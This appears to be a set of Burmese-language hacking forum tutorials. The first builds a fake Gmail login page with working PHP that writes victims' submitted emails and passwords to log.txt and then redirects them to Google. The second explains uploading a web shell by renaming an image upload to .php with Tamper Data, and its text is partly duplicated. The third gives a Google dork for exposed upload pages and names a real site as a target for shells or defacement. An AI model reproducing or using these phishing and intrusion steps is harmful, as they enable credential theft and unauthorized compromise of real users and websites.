ဟက္ကာက အဲ့ဒီ output file ကုိသြားဖြင့္ၾကည္႕ၿပီး ကုိယ့္ victim ရဲ႕ email & password ရယူျခင္းပဲျဖစ္ပါတယ္...

Phishing ျပဳလုပ္ဖုိ႔အတြက္.. လုိအပ္တာေတြကေတာ့
0x01: ကုိယ္ျပဳလုပ္ခ်င္တဲ့ webpage ရဲ႕ Source code
0x02: Hosting (or) Shell
0x03: Php code for Redirect password...
0x04: plane notepad file for output username & password

ကၽြန္ေတာ္အခုဒီက်ဴတုိမွာ Gmail စာမ်က္ႏွာအတု (gmail phishing)တစ္ခုဖန္တီးျပပါ့မယ္..
အရင္ဆံုး Gmail source code ရဖုိ႔..

www.gmail.com
ကုိသြားလုိက္ပါ.... ၿပီးရင္ Clt+U ကုိႏွိပ္ၿပီး Source code ေတြကုိေကာ္ပီယူၿပီး.. notepad မွာ paste ခ်ၿပီး.. gmail.html ဆုိတဲ့နာမည္နဲ႔ save လုိက္ပါ...
Gmail source code က <form action="" method=""> အစရွိတာပါတဲ့ စာေၾကာင္းကုိလုိက္ရွာရပါမယ္.. အဲ့ဒီကုတ္ကေတာ့ login ၀င္တဲ့ <form> tag ပါ...
အဲ့ဒီ line ကုိေတြ႔ရင္.. action ေနရာမွာ action="login.php" , method="post" နဲ႔အစားသြင္းလုိက္ပါ...
ၿပီးရင္ ေအာက္က php code ေတြကုိ login.php ဆုိတဲ့နာမည္ နဲ႔ save ၿပီး.. notepad plane file တစ္ခုကုိ log.txt လုိ႔နာမည္ေပးလုိက္ပါ...
Gmail ၀င္လုိက္တဲ့ password ေတြကုိ Redirect လုပ္ဖုိ႔ php code ပါ...



Code:

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
အဲ့ဒီ php code ကုိတစ္ခ်က္ၾကည္႕ရေအာင္..

header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
ဒါကေတာ့ gmail phishing မွာ login ၀င္လုိက္ရင္ Redirct ျပန္လုပ္ဖုိ႔သံုးသြားတဲ့ php code ပါ...

$handle = fopen("log.txt", "a");
ဒီဟာေလးကေတာ့.. user name နဲ႔ password ကုိ Out put ထုတ္ဖုိ႔အတြက္ပါ..
ကုိယ့္က log.txt လုိ႔နာမည္ေပးထားတဲ့အတြက္.. log.txt ဆုိတဲ့ notepad အလြတ္ တစ္ခုဖန္တီးၿပီး.. hosting or shell တစ္ခုခုေပၚအတူတူတင္ေပးထားရပါမယ္..
အဲ့ဒီ log.txt မွာ user name နဲ႔ password ေတြကုိ save ေပးမွာျဖစ္ပါတယ္..
အဲ့ဒီ file 3 file ကုိ hosting or shell ေပၚတင္လုိက္မယ္.. ကၽြန္ေတာ္ကေတာ့ shell ေပၚမွာပဲတင္လုိက္မယ္ဗ်ာ.. hosting ေပၚတင္မယ္ဆုိရင္ေတာ့ databse ေဆာက္ဖုိ႔လုိမယ္ထင္တယ္..ဒါမွ ျပန္၀င္လာတဲ့ username & password ကုိ သိမ္းဖုိ႔ database တစ္ခုလုိမယ္ထင္ပါတယ္..
shell ေပၚမွာ phishing ဆုိတဲ့ Folder တစ္ခုေဆာက္ၿပီး.. အဲ့ဖုိင္သံုးခုကုိတင္လုိက္ပါၿပီ..


Image has been scaled down 17% (900x455). Click this bar to view original image (1080x546). Click image to open in new window.


ကၽြန္ေတာ္က public_html/phishing/ အထဲမွာတင္ထားတဲ့အတြက္ လင့္ခ္ျပန္ထုတ္ရင္
http://www.site.com/phishing/ ဆိုၿပီးထုတ္ရမွာပါ..
gmail.html link ကုိထုတ္လုိက္မယ္..ဗ်ာ..
http://www.site.com/phishing/gmail.html


Image has been scaled down 17% (900x455). Click this bar to view original image (1080x546). Click image to open in new window.


အဲ့ link ကုိ ကုိယ့္ victim ထံပုိ႔လုိက္ရင္ victim က တကယ့္ gmail အစစ္ထင္ၿပီး email, password နဲ႔၀င္လုိက္ရင္....

http://www.site.com/phishing/log.txt မွာ out put ထုတ္ၿပီး email & password ကုိ ရသြားပါမယ္..


Image has been scaled down 17% (900x455). Click this bar to view original image (1080x546). Click image to open in new window.
0

[Tutorial] Temper Data သံုးျပီး Shell upload ဘယ္လိုတင္မလဲ?

Data ေျပာင္းလဲျခင္း ကို admin panel access ကိုကၽြန္ေတာ္တို႔ရတဲ႔အခါမွာအသံုးျပဳပါတယ္ Data ေျပာင္းလဲျခင္း ကို admin panel access ကိုကၽြန္ေတာ္တို႔ရတဲ႔အခါမွာအသံုးျပဳပါတယ္ shell ေတြကို .php or .asp ဖိုင္နဲ႔ Upload လုပ္ဖို႔ခြင္႔မျပဳတဲ႔အခါမ်ိဳးမွာပါ
ဒီေတာ႔ ကၽြန္ေတာ္တို႔က ဆိုက္ကို deface လုပ္လို႔မရပါဘူး ဒီေတာ႔လုပ္လို႔ရမယ္႔နည္းလမ္းကမရွိဘူးလားလို႔ေမးပါမယ္

ဟုတ္ကဲ႔ရပါတယ္ temper data ကိုသံုးျပီး shell ကိုတရား၀င္တင္လို႔ရပါတယ္ျပီးေတာ႔ fully execute လုပ္လို႔ရပါတယ္ ဘယ္လိုလုပ္မလဲဆိုေတာ႔
Data Temper လို႔ေခၚတဲ႔ Firefox addon ေလးသံုးျပီး file extension ကိုေျပာင္းလို႔ရပါတယ္ ဒါဆို ok ျပီးေပါ႔

Temper data သံုးဖို႔ ဒါေတြ႔ လိုပါတယ္
Firefox browser
Tamper Data Add on for firefox (
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
)
Site (ကၽြန္ေတာ္တို႔ upload shell တင္႔မယ္ site need upload access)

ok ဒါဆိုစလိုက္ရေအာင္
ပထမဆံုး temper data ကို firefox မွာ install လုပ္လိုက္ပါ ျပိးေတာ႔ upload လုပ္မယ္႔ shell ရဲ႕ website ထဲ႔ကို login ၀င္လိုက္ပါ
image ကို upload လုပ္မယ္႔ေနရာကိုသြားပါ

[Image: Tamper_Data1.png]

ျပီးေတာ႔ bowse ကိုႏွိပ္ျပီး .jpg,.png,.gif စတဲ႔ image shell ကို ေရြးလိုက္ပါ ျပီးေတာ႔ Temper data ကို Start လုပ္လိုက္ပါ biggrin

[Image: Tamper_Data2.png]

ဒီေတာ႔ temper data ရဲ႕ right column ရဲ႕post data ထဲမွာ .gif နဲ႔တင္ထားတဲ႔ image လမ္းေၾကာင္းကိုေတြ႔ပါလိမ္႔မယ္ ဒီေတာ႔ဒါကို .php extension ေျပာင္းလိုက္ေပါ႔ blink

[Image: Tamper_Data3.png]

ျပီးေတာ႔ Post Data ထဲမွာ ရွိတဲ႔ လမ္းေၾကာင္းကို copy ကူးျပီး click လိုက္ပါ ဒီေတာ႔ ကၽြန္ေတာ္တို႔ ဖိုင္က .php ခ်ိန္းသြားပါျပီ
ok ပါေစshell ေတြကို .php or .asp ဖိုင္နဲ႔ Upload လုပ္ဖို႔ခြင္႔မျပဳတဲ႔အခါမ်ိဳးမွာပါ
ဒီေတာ႔ ကၽြန္ေတာ္တို႔က ဆိုက္ကို deface လုပ္လို႔မရပါဘူး ဒီေတာ႔လုပ္လို႔ရမယ္႔နည္းလမ္းကမရွိဘူးလားလို႔ေမးပါမယ္

ဟုတ္ကဲ႔ရပါတယ္ temper data ကိုသံုးျပီး shell ကိုတရား၀င္တင္လို႔ရပါတယ္ျပီးေတာ႔ fully execute လုပ္လို႔ရပါတယ္ ဘယ္လိုလုပ္မလဲဆိုေတာ႔
Data Temper လို႔ေခၚတဲ႔ Firefox addon ေလးသံုးျပီး file extension ကိုေျပာင္းလို႔ရပါတယ္ ဒါဆို ok ျပီးေပါ႔

Temper data သံုးဖို႔ ဒါေတြ႔ လိုပါတယ္
Firefox browser
Tamper Data Add on for firefox (

Code:

https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ )
Site (ကၽြန္ေတာ္တို႔ upload shell တင္႔မယ္ site need upload access)

ok ဒါဆိုစလိုက္ရေအာင္
ပထမဆံုး temper data ကို firefox မွာ install လုပ္လိုက္ပါ ျပိးေတာ႔ upload လုပ္မယ္႔ shell ရဲ႕ website ထဲ႔ကို login ၀င္လိုက္ပါ
image ကို upload လုပ္မယ္႔ေနရာကိုသြားပါ



ျပီးေတာ႔ bowse ကိုႏွိပ္ျပီး .jpg,.png,.gif စတဲ႔ image shell ကို ေရြးလိုက္ပါ ျပီးေတာ႔ Temper data ကို Start လုပ္လိုက္ပါ



ဒီေတာ႔ temper data ရဲ႕ right column ရဲ႕post data ထဲမွာ .gif နဲ႔တင္ထားတဲ႔ image လမ္းေၾကာင္းကိုေတြ႔ပါလိမ္႔မယ္ ဒီေတာ႔ဒါကို .php extension ေျပာင္းလိုက္ေပါ႔



ျပီးေတာ႔ Post Data ထဲမွာ ရွိတဲ႔ လမ္းေၾကာင္းကို copy ကူးျပီး click လိုက္ပါ ဒီေတာ႔ ကၽြန္ေတာ္တို႔ ဖိုင္က .php ခ်ိန္းသြားပါျပီ
ok ပါေစ
0

Encodable သံုးပီး Deface တင္မယ္။



မဂၤလာပါ... ။ MNHF မွ members နဲ႔ admin မ်ားအားလံုး နွစ္သစ္မွာေပ်ာ္ရြင္ၾကပါေစ။
ဒီေန႔ကြ်န္ေတာ္ Tuto ေသးေသးေလးတစ္ခုေရးလုိက္ပါတယ္။(ခေယးေတြတြက္ေပါ့ေနာ္ ၾဆာေတြက်ေတာ့ေက်ာ္သြားေပါ့ )။ ဒီ Tuto ကေတာ့ Web Hacking(Trick )တစ္ခုျဖစ္ပါတယ္။ ေျပာရရင္ ဆုိဒ္တစ္ခုမွာ username and pass ေတြမသိပဲနဲ႔ Deface or Shell တင္ ႏိုင္တဲ့သေဘာပါပဲ။ (ေပ်ာ္ထွာ) ကဲ အရင္ဆံုး Google ကိုအားကိုးရမွာျဖစ္ပါတယ္။
ေအာက္က Dork ေလးနဲ႔ Google မွာရွိက္လုိက္ပါ။ ေရာယိုေနတဲ့ဆုိဒ္ေတြက်လာတာအမ်ားၾကီးပါပဲ။



Code:

intext:File Upload by Encodable



အဲ့ထဲမွာမွကိုယ္ၾကိဳက္တဲ့ဆုိဒ္တစ္ဆုိဒ္ကိုယူလုိက္ပါ။ ကြ်န္ေတာ္ကေတာ့ ေအာက္ကဆုိဒ္ကိုနမူနာယူပီး လုပ္ျပထားပါတယ္။


Code:

http://proprintidaho.com/upload/
ပီးရင္ေအာက္ကပံုမွာျမင္၇တဲ့တုိင္း file upload လုပ္ဖုိ႔ ေနရာရွိပါမယ္။


Image has been scaled down 29% (900x373). Click this bar to view original image (1265x524). Click image to open in new window.


file upload ၇ာမွာ jpg file ကိုပဲ
upload ေပးတာမ်ားပါတယ္။ ကိုယ့္ shell or deface page တင္တဲ့နည္းကိုေတာ့
အစ္ကိုတစ္ေယာက္ေ၇းထားတာသြားဖတ္ဖုိ႔လုိပါတယ္။
here


Code:

Code:

www.site.com/images/defacefilename
သို့မဟုတ္



Code:

www.site.com/upload/files/defacefilename
မွာ upload လုပ္သြားတာျဖစ္ပါတယ္။

And Ur Done
Demo


Code:

http://proprintidaho.com/upload/files/Screenshot.jpg